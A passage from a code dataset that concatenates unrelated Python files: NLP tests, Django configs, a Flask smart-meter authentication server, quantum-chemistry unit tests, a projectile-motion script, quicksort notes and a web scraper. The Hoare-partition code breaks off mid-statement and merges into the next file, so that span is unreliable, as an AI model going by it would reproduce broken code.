enc_all_deps.append(_)\n\n# \n# more_than_once=[]\n# for dep in enc_all_deps:\n# for dep2 in enc_all_deps:\n# if dep==dep2:\n# more_than_once.append(dep)\n\ndep_freq_dict={}\nfor dep in enc_all_deps:\n if tuple(dep) in dep_freq_dict:\n dep_freq_dict[tuple(dep)]+=1\n else:\n dep_freq_dict[tuple(dep)]=1\n\n# stanford NLP check\n# check spacy github repo, for dependency matcher from text\n\n \n\n\n\n\n\n# test\ntest=test_dep_paths[1][0]\n[x.split('-')[2] for x in test.split()]\n\n\n# TODO: Freq of dep extractions\n\n\n# test dep\ndoc=nlp(u'Countries such as Spain, France and Germany.')\nspacy.displacy.render(doc,style='dep')\n\nedges=[] \nfor token in doc:\n for child in token.children:\n edges.append(('{0}'.format(token.lower_),'{0}'.format(child.lower_)))\n\ng=nx.Graph(edges)\npath=nx.shortest_path(g,source='spain',target='countries')\npaths=[]\nfor word in path:\n for token in doc:\n if word==token.text.lower():\n paths.append(token.text+'-'+token.pos_+'-'+token.dep_)\n \n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"212654157","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url( r'^$', views.index, name='index' ),\n url( r'^ver/(.*)?/$', views.ver, name='ver' ),\n url( r'manejar/(.*)?/$', views.manejar, name='manejar' ),\n url( r'eliminar/(.*)?/$', views.eliminar, name='eliminar' )\n]","sub_path":"paises/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"436121881","text":"import hashlib\nimport json\nimport base64\nimport requests\nfrom flask import Flask\nfrom flask import jsonify, make_response, request\nfrom flask_sqlalchemy import SQLAlchemy\nfrom random import randint\nfrom datetime import datetime\nfrom Crypto.Cipher import AES\nfrom fastecdsa import curve, point\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///data'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\nid = None\nrid = None\npub_key = None\nrid_ta = None\nbase_point = None\nprime = (2 ** 256) - (2 ** 224) + (2 ** 192) + (2 ** 96) - 1\nfield = prime\nmax_transmission_time = 2\n\n\nclass SmartMeter(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n shared_token = db.Column(db.String(250))\n pseudo_identity = db.Column(db.String(250))\n otp = db.Column(db.String(8))\n session_key = db.Column(db.String(250))\n\n\ndef length_equalise(x, y):\n if len(x) > len(y):\n y = y + ' ' * (len(x) - len(y))\n elif len(y) > len(y):\n x = x + ' ' * (len(y) - len(x))\n\n return x, y\n\n\ndef xor_word(str1, str2):\n return ''.join(chr(ord(s) ^ ord(c)) for s, c in zip(*length_equalise(str1, str2)))\n\ndef get_nonce():\n return randint(0, field - 1)\n\n\n@app.route(\"/add_substation\", methods=[\"POST\"])\ndef initialize():\n global id, rid, pub_key, rid_ta, base_point\n data = json.loads(request.get_json())\n\n if data is None:\n return make_response(\"Invalid Request\", 400)\n\n id = data['id_ss']\n rid = data['rid_ss']\n pub_key = data['pub_key']\n rid_ta = data['rid_ta']\n base_point = data['base_point']\n\n return make_response(\"Substation Initialised\", 200)\n\n\n@app.route('/add-smart-meter', methods=['POST'])\ndef add_smart_meter():\n data = request.get_json()\n shared_token = data['shared_token']\n smart_meter_rid = data['pseudo_identity']\n otp = randint(10000, 999999)\n # otp = 278324\n new_smart_meter = SmartMeter(shared_token=shared_token, pseudo_identity=smart_meter_rid, otp=otp)\n db.session.add(new_smart_meter)\n db.session.commit()\n requests.get('http://localhost:8000/first-handshake')\n\n return make_response('Smart Meter added', 200)\n\n\n@app.route('/first-handshake', methods=['POST'])\ndef first_contact():\n data = json.loads(request.get_json())\n request_time_string = data['Time']\n request_time = datetime.strptime(request_time_string, '%Y-%m-%d %H:%M:%S.%f')\n current_time = datetime.now()\n timedelta = current_time - request_time\n\n if timedelta.seconds > max_transmission_time:\n return make_response('Stale Request', 400)\n\n phi = data['phi']\n alpha = data['alpha']\n encrypted_message = data['E']\n smart_meter_public_key = data['pub_sm']\n X_i = data['X_i']\n A_i = data['A_i']\n\n hashed_rid = hashlib.sha256((rid + str(phi)).encode()).hexdigest()\n xored_result = xor_word(alpha, hashed_rid)\n shared_token = xored_result.split('@')[0]\n\n a_smart_meter = SmartMeter.query.filter_by(shared_token=shared_token).scalar()\n\n if not a_smart_meter or xored_result.split('@')[1] != request_time_string:\n return make_response('Malicious Request. Dropping computation', 400)\n\n smart_meter_rid = a_smart_meter.pseudo_identity\n\n encryption_obj = AES.new(smart_meter_rid[:16].encode(), AES.MODE_CBC, shared_token.encode())\n encrypted_message = base64.b64decode(encrypted_message)\n original_message = encryption_obj.decrypt(encrypted_message).decode()\n otp = original_message.strip()\n\n if str(a_smart_meter.otp) != otp:\n return make_response('Malicious Request, OTP does not match. Dropping computation', 400)\n\n ci_hashed = hashlib.sha256((str(smart_meter_public_key['x']) + str(smart_meter_public_key['y']) +\n str(pub_key['x']) + str(pub_key['y'])).encode()).hexdigest()\n ci = int(ci_hashed, 16)\n\n lhs = curve.P256.G * A_i\n sm_pub_key = point.Point(smart_meter_public_key['x'], smart_meter_public_key['y'], curve=curve.P256)\n public_key = point.Point(pub_key['x'], pub_key['y'], curve=curve.P256)\n Xi = point.Point(X_i['x'], X_i['y'], curve=curve.P256)\n rhs = Xi + (sm_pub_key + (public_key * ci))\n\n if lhs == rhs:\n rnd_nonce = get_nonce()\n T2 = str(datetime.now())\n y_hashed = hashlib.sha256((smart_meter_rid + rid_ta + str(rnd_nonce) + str(otp) + T2).encode('utf-8')).hexdigest()\n y = int(y_hashed, 16)\n Yi = curve.P256.G * y\n Zi = y * Xi\n\n session_key = hashlib.sha256(str(smart_meter_rid + rid + str(A_i) + str(Zi) + str(Yi)).encode('utf-8')).hexdigest()\n a_smart_meter.session_key = session_key\n db.session.commit()\n Vi = hashlib.sha256((str(session_key) + str(request_time_string) + T2 + str(otp.strip())).encode('utf-8')).hexdigest()\n\n Y = {\n \"x\": Yi.x,\n \"y\": Yi.y\n }\n response = {\n \"Yi\": Y,\n \"Vi\": Vi,\n \"Time\": T2\n }\n return make_response(jsonify(response), 200)\n else:\n return make_response(\"Malicious Request. Verification Failed.\", 400)\n\n\n@app.route('/second-handshake', methods=['POST'])\ndef second_contact():\n data = json.loads(request.get_json())\n request_time_string = data['Time']\n request_time = datetime.strptime(request_time_string, '%Y-%m-%d %H:%M:%S.%f')\n current_time = datetime.now()\n timedelta = current_time - request_time\n\n if timedelta.seconds > max_transmission_time:\n return make_response('Stale Request', 400)\n\n ack = data['ack']\n phi = data['phi']\n alpha = data['alpha']\n hashed_rid = hashlib.sha256((rid + str(phi)).encode()).hexdigest()\n xored_result = xor_word(alpha, hashed_rid)\n shared_token = xored_result.split('@')[0]\n\n a_smart_meter = SmartMeter.query.filter_by(shared_token=shared_token).scalar()\n\n session_key = a_smart_meter.session_key\n ack_calculated = hashlib.sha256((str(session_key) + request_time_string).encode('utf-8')).hexdigest()\n\n if ack == ack_calculated:\n return make_response('Verified', 200)\n else:\n return make_response(\"Malicious Request. Verification Failed.\", 400)\n\n\nif __name__ == '__main__':\n db.create_all()\n app.run(port=8001, debug=True)\n","sub_path":"Substation/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"587435983","text":"# Copyright 2020 Google LLC\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\" fci_graph unit tests\n\"\"\"\n#pylint: disable=protected-access\n\nimport numpy\nfrom numpy import linalg\nimport pytest\n\nfrom openfermion import FermionOperator\nfrom openfermion import bravyi_kitaev_code\n\nfrom fqe import wavefunction\nfrom fqe.hamiltonians import *\nfrom fqe.fqe_ops.fqe_ops import (\n NumberOperator,\n S2Operator,\n SzOperator,\n TimeReversalOp,\n)\nfrom fqe.fqe_decorators import build_hamiltonian\nfrom tests.unittest_data import build_hamiltonian as test_hamiltonian\nfrom fqe.util import tensors_equal\n\nimport fqe\n\n\ndef test_fqe_control_dot_vdot():\n \"\"\"Find the dot product of two wavefunctions.\n \"\"\"\n wfn1 = fqe.get_number_conserving_wavefunction(4, 8)\n wfn1.set_wfn(strategy='ones')\n wfn1.normalize()\n assert round(abs(fqe.vdot(wfn1, wfn1) - 1. + .0j), 7) == 0\n assert round(abs(fqe.dot(wfn1, wfn1) - 1. + .0j), 7) == 0\n wfn1.set_wfn(strategy='random')\n wfn1.normalize()\n assert round(abs(fqe.vdot(wfn1, wfn1) - 1. + .0j), 7) == 0\n\n\ndef test_Wavefunction():\n \"\"\"Test free function that construct a Wavefunction object\n \"\"\"\n wfn1 = fqe.Wavefunction([[2, 0, 2]])\n wfn2 = wavefunction.Wavefunction([[2, 0, 2]])\n for key, sector in wfn1._civec.items():\n assert key in wfn2._civec\n assert sector.coeff.shape == wfn2._civec[key].coeff.shape\n\n\ndef test_initialize_new_wavefunction():\n \"\"\"Test initialization of the new wavefunction\n \"\"\"\n nele = 3\n m_s = -1\n norb = 4\n wfn = fqe.get_wavefunction(nele, m_s, norb)\n assert isinstance(wfn, wavefunction.Wavefunction)\n\n\ndef test_initialize_new_wavefunctions_multi():\n \"\"\"Test initialization of the new wavefunction with multiple parameters\n \"\"\"\n multiple = [[4, 0, 4], [4, 2, 4], [3, -3, 4], [1, 1, 4]]\n wfns = fqe.get_wavefunction_multiple(multiple)\n for wfn in wfns:\n assert isinstance(wfn, wavefunction.Wavefunction)\n\n\ndef test_time_evolve():\n \"\"\"Test time_evolve of a wavefunction\n \"\"\"\n wfn1 = fqe.Wavefunction([[2, 0, 2]])\n wfn1.set_wfn('ones')\n wfn2 = wavefunction.Wavefunction([[2, 0, 2]])\n wfn2.set_wfn('ones')\n op = FermionOperator('1^ 3') + FermionOperator('3^ 1')\n time = 1.2\n wfn1 = fqe.time_evolve(wfn1, time, op, True)\n wfn2 = wfn2.time_evolve(time, op, True)\n for key, sector in wfn1._civec.items():\n assert key in wfn2._civec\n assert sector.coeff.shape == wfn2._civec[key].coeff.shape\n assert numpy.allclose(sector.coeff, wfn2._civec[key].coeff)\n\n\ndef test_apply():\n \"\"\"Test time_evolve of a wavefunction\n \"\"\"\n wfn1 = fqe.Wavefunction([[2, 0, 2]])\n wfn1.set_wfn('ones')\n wfn2 = wavefunction.Wavefunction([[2, 0, 2]])\n wfn2.set_wfn('ones')\n op = FermionOperator('1^ 3') + FermionOperator('3^ 1')\n wfn1 = fqe.apply(op, wfn1)\n wfn2 = wfn2.apply(op)\n for key, sector in wfn1._civec.items():\n assert key in wfn2._civec\n assert sector.coeff.shape == wfn2._civec[key].coeff.shape\n assert numpy.allclose(sector.coeff, wfn2._civec[key].coeff)\n\n\ndef test_expectationValue():\n \"\"\"Test time_evolve of a wavefunction\n \"\"\"\n wfn1 = fqe.Wavefunction([[2, 0, 2]])\n wfn1.set_wfn('ones')\n wfn2 = wavefunction.Wavefunction([[2, 0, 2]])\n wfn2.set_wfn('ones')\n op = sparse_hamiltonian.SparseHamiltonian(FermionOperator('1^ 3'))\n ex1 = fqe.expectationValue(wfn1, op)\n ex2 = wfn2.expectationValue(op)\n assert numpy.isclose(ex1, ex2)\n\n\ndef test_apply_generated_unitary():\n \"\"\"Test applying generated unitary transformation\n \"\"\"\n norb = 4\n nele = 3\n time = 0.001\n ops = FermionOperator('1^ 3^ 5 0', 2.0 - 2.j) + FermionOperator(\n '0^ 5^ 3 1', 2.0 + 2.j)\n\n wfn = fqe.get_number_conserving_wavefunction(nele, norb)\n wfn.set_wfn(strategy='random')\n wfn.normalize()\n\n reference = fqe.apply_generated_unitary(wfn, time, 'taylor', ops)\n\n h1e = numpy.zeros((2 * norb, 2 * norb), dtype=numpy.complex128)\n h2e = hamiltonian_utils.nbody_matrix(ops, norb)\n h2e = hamiltonian_utils.antisymm_two_body(h2e)\n hamil = general_hamiltonian.General(tuple([h1e, h2e]))\n compute = wfn.apply_generated_unitary(time, 'taylor', hamil)\n\n for key in wfn.sectors():\n diff = reference._civec[key].coeff - compute._civec[key].coeff\n err = linalg.norm(diff)\n assert err < 1.e-8\n\n\ndef test_cirq_interop(c_or_python):\n \"\"\"Check the transition from a line qubit and back.\n \"\"\"\n fqe.settings.use_accelerated_code = c_or_python\n work = numpy.random.rand(16).astype(numpy.complex128)\n work[0] = 0.0 + 0.0j\n work[15] = 0.0 + 0.0j\n norm = numpy.sqrt(numpy.vdot(work, work))\n numpy.divide(work, norm, out=work)\n wfn = fqe.from_cirq(work, thresh=1.0e-7)\n sec = [(1, -1), (1, 1), (2, -2), (2, 0), (2, 2), (3, -1), (3, 1)]\n assert set(sec) == set(wfn._civec.keys())\n test = fqe.to_cirq(wfn)\n assert numpy.allclose(test, work)\n\n # check with Bravyi-Kitaev\n bc = bravyi_kitaev_code(4)\n wfn = fqe.from_cirq(work, thresh=1.0e-7, binarycode=bc)\n test = fqe.to_cirq(wfn, binarycode=bc)\n assert numpy.allclose(test, work)\n\n\ndef test_get_spin_conserving_wavefunction():\n \"\"\" Test get_spin_conserving_wavefunction\n \"\"\"\n norb = 4\n s_z = 2\n wfn_spin = fqe.get_spin_conserving_wavefunction(s_z, norb)\n\n assert 's_z' in wfn_spin._conserved.keys()\n assert wfn_spin._conserved['s_z'] == 2\n assert wfn_spin.conserve_spin()\n\n ref_sectors = {(2, 2), (4, 2), (6, 2)}\n assert ref_sectors == set(wfn_spin.sectors())\n\n s_z = -2\n\n wfn_spin = fqe.get_spin_conserving_wavefunction(s_z, norb)\n\n assert 's_z' in wfn_spin._conserved.keys()\n assert wfn_spin._conserved['s_z'] == -2\n assert wfn_spin.conserve_spin()\n\n ref_sectors = {(2, -2), (4, -2), (6, -2)}\n assert ref_sectors == set(wfn_spin.sectors())\n\n\ndef test_get_number_conserving_wavefunction():\n \"\"\" Test get_number_conserving_wavefunction\n \"\"\"\n norb = 4\n nel = 2\n wfn_spin = fqe.get_number_conserving_wavefunction(nel, norb)\n\n assert 'n' in wfn_spin._conserved.keys()\n assert wfn_spin._conserved['n'] == 2\n assert wfn_spin.conserve_number()\n\n ref_sectors = {(2, 2), (2, 0), (2, -2)}\n assert ref_sectors == set(wfn_spin.sectors())\n\n\ndef test_operator_constructors():\n \"\"\" Creation of FQE-operators\n \"\"\"\n assert isinstance(fqe.get_s2_operator(), S2Operator)\n assert isinstance(fqe.get_sz_operator(), SzOperator)\n assert isinstance(fqe.get_time_reversal_operator(), TimeReversalOp)\n assert isinstance(fqe.get_number_operator(), NumberOperator)\n\n\ndef test_get_hamiltonian_from_openfermion_raises():\n \"\"\" Check the type check of get_hamiltonian_from_openfermion()\n \"\"\"\n with pytest.raises(AssertionError):\n fqe.get_hamiltonian_from_openfermion([])\n\n\ndef test_get_hamiltonian_from_openfermion():\n \"\"\" Check get_hamiltonian_from_openfermion()\n \"\"\"\n norb = 4\n ops = test_hamiltonian.number_nonconserving_fop(2, norb=norb)\n test = fqe.get_hamiltonian_from_openfermion(ops, norb=norb, \\\n conserve_number=False)\n test2 = build_hamiltonian(ops, norb=norb, conserve_number=False)\n assert test == test2\n\n\ndef test_get_diagonal_hamiltonian():\n \"\"\" Check whether get_diagonal_hamiltonian returns the same value as its\n underlying function is supposed to return.\n \"\"\"\n diag = numpy.zeros((5,), dtype=numpy.complex128)\n e_0 = -4.2\n test = diagonal_hamiltonian.Diagonal(diag, e_0)\n test2 = fqe.get_diagonal_hamiltonian(diag, e_0)\n\n assert test == test2\n\n\ndef test_get_diagonal_coulomb():\n \"\"\" Check whether get_diagonal_coulomb returns the same value as its\n underlying function is supposed to return.\n \"\"\"\n diag = numpy.zeros((5, 5), dtype=numpy.complex128)\n e_0 = -4.2\n test = diagonal_coulomb.DiagonalCoulomb(diag, e_0)\n test2 = fqe.get_diagonalcoulomb_hamiltonian(diag, e_0)\n\n assert test == test2\n\n\n@pytest.mark.parametrize(\"hamiltonian, get_function\", \\\n [ (sso_hamiltonian.SSOHamiltonian, fqe.get_sso_hamiltonian),\n (gso_hamiltonian.GSOHamiltonian, fqe.get_gso_hamiltonian),\n (general_hamiltonian.General, fqe.get_general_hamiltonian),\n (restricted_hamiltonian.RestrictedHamiltonian, \\\n fqe.get_restricted_hamiltonian)\n ])\ndef test_get_hamiltonians(hamiltonian, get_function):\n \"\"\" Check whether other Hamiltonian getters return the same value\n as their underlying functions are supposed to return.\n \"\"\"\n h1e = numpy.random.rand(5, 5).astype(numpy.complex128)\n e_0 = -4.2\n test = hamiltonian((h1e,))\n test2 = get_function((h1e,))\n\n assert test == test2\n\n\ndef test_get_sparse_hamiltonian():\n oper = FermionOperator('0 0^')\n test = sparse_hamiltonian.SparseHamiltonian(oper)\n test2 = fqe.get_sparse_hamiltonian(oper)\n\n assert test == test2\n","sub_path":"tests/_fqe_control_test.py","file_name":"_fqe_control_test.py","file_ext":"py","file_size_in_byte":9485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"194479654","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom flask import Flask, send_from_directory, request, jsonify\nfrom flask_cors import CORS, cross_origin\napp = Flask(__name__)\nCORS(app)\n\nfrom UploadSectionsHandler import UploadSectionsHandler\nfrom GetSectionsHandler import GetSectionsHandler\nfrom UploadPathHandler import UploadPathHandler\nfrom BoundingBoxHandler import BoundingBoxHandler\nfrom UploadMapHandler import UploadMapHandler\nfrom GetSVGPathHandler import GetSVGPathHandler\nfrom UploadImageHandler import UploadImageHandler\n\nfrom DatabaseManager import DatabaseManager\n\nfrom InvalidUsage import InvalidUsage\nimport sys\n\n@app.errorhandler(InvalidUsage)\ndef handle_invalid_usage(error):\n response = jsonify(error.to_dict())\n response.status_code = error.status_code\n return response\n\n@app.route('/')\ndef hello_world():\n return \"hello world\"\n\n# used to upload the SVG map\n@app.route('/upload-map', methods=['POST'])\ndef uploadMap():\n try:\n return UploadMapHandler().processRequest(request)\n except:\n raise InvalidUsage(str(sys.exc_info()))\n\n# used to upload an image for section content\n@app.route('/upload-image', methods=['POST'])\ndef uploadImage():\n try:\n return UploadImageHandler().processRequest(request)\n except:\n raise InvalidUsage(str(sys.exc_info()))\n\n# used after path has been adjusted, uploads path, zoom level, osm data and points\n@app.route('/upload-path', methods=['POST'])\ndef path():\n try:\n return UploadPathHandler().processRequest(request)\n except:\n raise InvalidUsage(str(sys.exc_info()))\n\n# requests boundingbox of a given mapId\n@app.route('/boundingbox', methods=['GET'])\ndef boundingbox():\n try:\n return BoundingBoxHandler().processRequest(request)\n except:\n raise InvalidUsage(str(sys.exc_info()))\n\n# requests the flattened svg path in coordinates\n@app.route('/svg-path', methods=['GET'])\ndef svgPath():\n try:\n return GetSVGPathHandler().processRequest(request)\n except:\n raise InvalidUsage(str(sys.exc_info()))\n\n# requests sections for a given mapId\n@app.route('/storytelling-sections', methods=['GET'])\ndef storytellingSections():\n try:\n return GetSectionsHandler().processRequest(request)\n except:\n raise InvalidUsage(str(sys.exc_info()))\n\n# uploads changes to storytelling sections\n@app.route('/upload-storytelling-sections', methods=['POST'])\ndef uploadStorytellingSections():\n try:\n return UploadSectionsHandler().processRequest(request)\n except:\n raise InvalidUsage(str(sys.exc_info()))\n\n\n@app.route('/backend/output/')\ndef send_output(path):\n return send_from_directory('output', path)\n\nif __name__ == \"__main__\":\n DatabaseManager().initializeDatabase()\n app.run(debug=True, threaded=True)\n","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"402136395","text":"import matplotlib.pylab as plt\nimport numpy as np\nimport math\n\n# nasz program bedzie się rozwijał z czasem o nowe przypadki tak by obiąć jak najszerszy zakres wszelkich rzutów\n# część interakcyjna z użytkownikeim jest zaplanowana na późniejsze terminy więc narazie przyjmiemy sobie pewne sałe\n\n# oznaczenia:\ng = 9.81 # można zmienic jak coś narazie jako stała w [m/s^2]\nh = 1.0 # wysokość z jakie rozpoczynamy rzut [m]\nVo = 20 # prędkość początkowa [m/s]\nalfa = 60 # kąt nachylenia wektora Vo od poziomu w stopniach ustalić przdział\ntc = 0.0 # calkowity czas lotu\nH = 0.0 # maksymalna wysokosc ns jaka wzniesie sie cialo od wysokosci poczatkowej\nHmax = 0.0 # maksymalna wysokosc na jaka wzniesie sie cialo\nz = 0.0 # zasieg rzutu\nt = 0.0\nVgr = 8000 #predkosc gazow wyrzucanych z rakiety\na = 5 #tempo utraty masy\nm = 250\nG = 6.7*(10**(-11))\nMz = 6*(10**24) #[kg]\nRz = 6371000 #[m]\nV1 = np.around(np.sqrt((G*Mz)/Rz), 1) #[m/s]\nV2 = np.around((np.sqrt(2) * V1), 1)\nx = []\ny = []\n\ndef skladowe (kat,pirewotna): #progra liczący skłodwe wektorów\n sinalf = np.around(np.sin(np.deg2rad(kat)),4)\n cosalf = np.around(np.cos(np.deg2rad(kat)),4)\n skłX = np.around(pirewotna * cosalf,4)\n skłY = np.around(pirewotna * sinalf,4)\n print('składowa wartosc poczatkowej wzdluz x:', skłX \\\n , 'składowa wartosc poczatkowej wzdluz y:', skłY)\n return [skłX,skłY]\n\n\ndef CzasLotu(g, Vox, Voy, h, beta):\n # x = Vox * t ==> t = x/Vox\n # y = h + Voy*t - (g*t^2)/2 ==> y = h + (Voy/Vox)*x - (g*x^2)/2*Vox^2\n # y = tg(beta)*t ==> y = tg(beta)/Vox * x\n # -(g*x^2)/2*Vox^2 + (Voy/Vox - tg(beta)/Vox) * x + h = 0\n a = - g / (2 * (Vox**2))\n b = (Voy/Vox) - (np.tan(np.deg2rad(beta)) / Vox)\n c = h\n delta = (b * b) - 4 * a * c\n x1 = (-b - math.sqrt(delta)) / (2 * a)\n x2 = (-b + math.sqrt(delta)) / (2 * a)\n if x1 >= x2:\n t = np.around(x1/Vox, 4)\n else:\n t = np.around(x2/Vox, 4)\n print('Czas lotu wynosi t =', t)\n return (t)\n\n\ndef MaxWysokosc(Voy, g): # program liczacy maksymalna wysokosc ciała\n H = np.around((Voy ** 2) / (2 * g), 4)\n Hmax = H + h\n print('maksymalna wysokosc na jaka wzleci cialo to H =', Hmax, 'm')\n return (Hmax)\n\n\ndef Zasieg(Vox, tc):\n z = np.around(Vox * tc, 4)\n print('Zasieg rzutu to z =', z, 'm')\n return (z)\n\ndef PredkosciChwilowe(tc, Vox, Voy, g,t,Hmax,h):\n global x\n global y\n i = 0\n while t < tc:\n Vx = Vox\n Vy = Voy - g * t\n if i >= 1:\n x.append(Vx * t)\n y.append(y[i-1] + Vy * dt)\n else:\n x.append(Vx * t)\n y.append(h + Vy * t)\n dt = 0.1\n t = t + dt\n i += 1\n return x, y\n\ndef Rakieta(m, a, t, Vgr):\n print(\"Rakieta\")\n while (a*t) <= 3*m/4:\n Vr = np.around(Vgr * np.log(m/(m - a * t)), 1)\n t += 0.5\n if Vr >= V1:\n print(\"Rakieta osiagnela I predkosc kosmiczna i moze pozostac na orbicie ziemi\")\n return Vr\n print(\"Rakieta nie osiagnela I predkosci kosmicznej\")\n\ndef InnePlanety(G, Mz, Rz):\n planety = {}\n odp = \"TAK\"\n print(\"Program oblicza I predkosc kosmiczna dla roznych planet. Predkosc jest podana w m/s.\")\n while odp == \"TAK\":\n nazwa = input(\"Wprowadz nazwe planety: \")\n x = float(input(\"Masa planety. Wprowadz liczbe przez ktora ma zostac przemnozona masa ziemi: \"))\n y = float(input(\"Promien planety. Wprowadz liczbe przez ktora ma zostac przemnozony promien ziemi: \"))\n mp = x * Mz\n rp = y * Rz\n v = np.around(np.sqrt((G * mp) / rp), 4)\n planety[nazwa] = v\n print(planety)\n odp = str.upper(input(\"Czy chcesz dodac kolejna planete, wpisz TAK lub NIE: \"))\n return planety\n\nprint('Witaj!!!!')\nh = float(input('Z jakiej wysokości rzucic h = '))\nalfa = float(input('Pod jakim kątem do poziomu rzut ma zostać wykonany alfa = '))\nVo = float(input('Jaka ma byc prędkość początkowa obiektu Vo = '))\nprint(\"\"\"\n 0 - podłoże nie idzie w góre ani w dół\n 1 - podłoże idzie w górę pod kątem beta do poziomu\n 2 - podłoże idzie w dół pod kątem beta do poziomu\n \"\"\")\nwybor = int(input('Twój wybór to: '))\nif wybor == 0:\n beta = 0\nelif wybor == 1:\n beta = float(input('Kąt beta ma wynosić beta = '))\nelif wybor == 2:\n beta = float(input('Kąt beta ma wynosić beta = '))\n beta = 180 - beta\nelse:\n print('Błąd nie ma takiego wyboru!!!')\n\nVox, Voy = skladowe(alfa, Vo)\ntc = CzasLotu(g,Vox,Voy,h,beta)\nHmax = MaxWysokosc(Voy, g)\nz = Zasieg(Vox, tc)\nPredkosciChwilowe(tc,Vox,Voy,g,t,Hmax,h)\n\nplt.plot(x, y)\nplt.title(\"Wykres rzutu\")\nplt.show()\n\n","sub_path":"rzut_poprawawzoru.py","file_name":"rzut_poprawawzoru.py","file_ext":"py","file_size_in_byte":4739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"625098194","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('Departamentos', '0008_auto_20150808_0104'),\n ('Historicos', '0004_auto_20150804_0456'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='registro',\n name='fk_departamento',\n field=models.ForeignKey(to='Departamentos.Departamento', null=True),\n ),\n ]\n","sub_path":"apps/Historicos/migrations/0005_registro_fk_departamento.py","file_name":"0005_registro_fk_departamento.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"9363693","text":"'''\nLomuto Partion.\n\nCondition for quick sort:\nLet's taeke an element pivot, and all the elements left to pivot is less than pivot and all the elements right to pivot is greater than pivot.\n\nThe main core for the quick sort is the partion.\n\n1. Make the last element as pivot and partion index as start.\n2. Traverse to the array, check if the ith element is less than or equal to pivot element.\n3. if the ith element is smaller, swap it with partion index. Increment the partion index.\n4. After all the swapping is done with ith and partion index, swap the end element and partion index.\n\n'''\n\n# Lomuto partion\n# def partion(array, start, end):\narray = [10,7,8,9,1,5]\nn = len(array)\nprint(\"Length\",n)\nstart = 0\nend = n-1\npivot = array[end]\nprint(\"Pivot\", pivot)\np_index = start\n\nfor i in range(n-1):\n\tprint(\"i:\",i)\n\tif array[i] <= pivot:\n\t\tprint(\"array[i]:\",array[i],\"pivot\", pivot)\n\t\tarray[i], array[p_index] = array[p_index], array[i]\n\t\tp_index += 1\n# swapping pivot and partion index\n\narray[end], array[p_index] = array[p_index], array[end]\nprint(array)\n\n'''\nHoare Partion:\n\nMost cases first element is pivot element.\n\n1. Make 2nd element as start is 'i' and last is 'j' element as end.\n2. Compare the ith element with pivot element, if the ith element is greater than pivot element, pause the i there.\n3. Now compare the pivot with element in j index, if the jth element is less than pivot swap i and j element.\n4. On moving forward we have to increment the j and for j decrement the j.\n5. Once if j crossed i swap the j and pivot element.\n\n'''\n# Hoare Partion\narray = [10, 7, 9, 8, 1, 5]\nn = len(array)\nprint(\"length:\", n)\nstart = 0\nend = n-1\npIndex = start\npivot = array[pIndex]\nwhile start pivot:\n\t\tend -= 1\n\n\tif start\"\n\nimport argparse, os, logging\nimport json\nfrom bs4 import BeautifulSoup\n\nlogging.basicConfig(filename='gent-simplify.log', level=logging.DEBUG)\n\ndef ckanparse(infile, outfile):\n\t\"\"\"Parse HTML file and store it in a new (simplified) JSON file.\"\"\"\n\tlogging.info('Parsing ' + str(infile))\n\n\tdata = {} \n\n\twith open(infile, 'r') as f:\n\t\tsoup = BeautifulSoup(f.read())\n\t\t\n\t\tdata['title'] = soup.find('h1', class_='title').get_text()\n\n\t\tbody = soup.find('div', class_='field-name-body')\n\t\tdata['body'] = body.find('p').get_text()\n\n\t\tfor k in ('contexts', 'urls', 'fmts', 'tags', 'license'):\n\t\t\tdata[k] = set()\t\n\n\t\tname = soup.find('link', rel='canonical')\n\t\tdata['contexts'].add('http://data.gent.be' + name['href'])\n\n\t\tnode = soup.find('div', class_='node-dataset')\n\n\t\tdiv = node.find('div', class_='field-name-field-basisinformatie')\n\t\tif div:\n\t\t\thref = div.find('a')\n\t\t\tif href:\n\t\t\t\tdata['contexts'].add(href['href'])\n\n\t\tdiv = node.find('fieldset', class_='group-download')\n\t\tif div:\n\t\t\threfs = div.find_all('a')\n\t\t\tfor href in hrefs:\n\t\t\t\tdata['urls'].add(href['href'])\n\t\t\t\tdata['fmts'].add(href.get_text())\n\n\t\tfor label in node.find_all('a', typeof='skos:Concept'):\n\t\t\tdata['tags'].add(label.get_text())\n\n\t# Add defaults for required fields\n\tdata['body'] = data['body'].strip()\n\n\tdata['org'] = ['--Gent']\n\tdata['geo'] = ['----Gent']\n\t\n\tdata['media'] = ['Download', 'Webservice']\n\n\tdata['license'].add('Zie website van de data leverancier')\n\n\t# make entries JSON serializable \n\tfor k in ('contexts', 'urls', 'tags', 'fmts', 'license'): \n\t\tdata[k] = list(data[k])\n\t\n\twith open(outfile, 'w') as 